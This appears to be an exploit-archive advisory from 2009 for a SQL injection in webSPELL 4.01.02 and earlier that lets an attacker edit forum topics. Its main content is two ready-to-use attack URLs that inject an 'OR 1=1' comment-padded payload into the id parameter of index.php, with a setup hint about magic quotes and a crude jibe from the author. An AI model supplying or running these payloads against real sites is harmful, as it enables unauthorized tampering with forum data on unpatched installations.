[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : webSPELL <= 4.01.02 (id) Remote Edit Topics Vulnerability
# Published : 2009-01-04
# Author : StAkeR
# Previous Title : PHPAuctionSystem Insecure Cookie Handling Vulnerability
# Next Title : PNphpBB2 <= 1.2i (ModName) Multiple Local File Inclusion Exploit
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
| webSPELL <= 4.01.02 (id) Remote Edit Topics Vulnerability | Note |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
| discovered by athos - staker[at]hotmail[dot]it | magic quotes 0 |
| download on http://wesbpell.org | enjoy your aids |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+--=--=--=--=--=-=+
| Exploit |
| index.php?site=forum_topic&topic=[ID]&edit=true&id=1/**/%27/**/OR/**/1=1/* |
| index.php?site=forum_topic&topic=1&edit=true&id=1/**/%27/**/OR/**/1=1/* |
+=--=--=--=--=--+--=--=--=--=--=--=--=--=--=--=--=--=--=--=--+-=--=--=--=--=--=+
| http://www.youtube.com/watch?v=SY1SwqLOC3c |
+--=--=--=--=--=--=--=--=--=--=--=--=--=--=--+
# www.Syue.com [2009-01-04]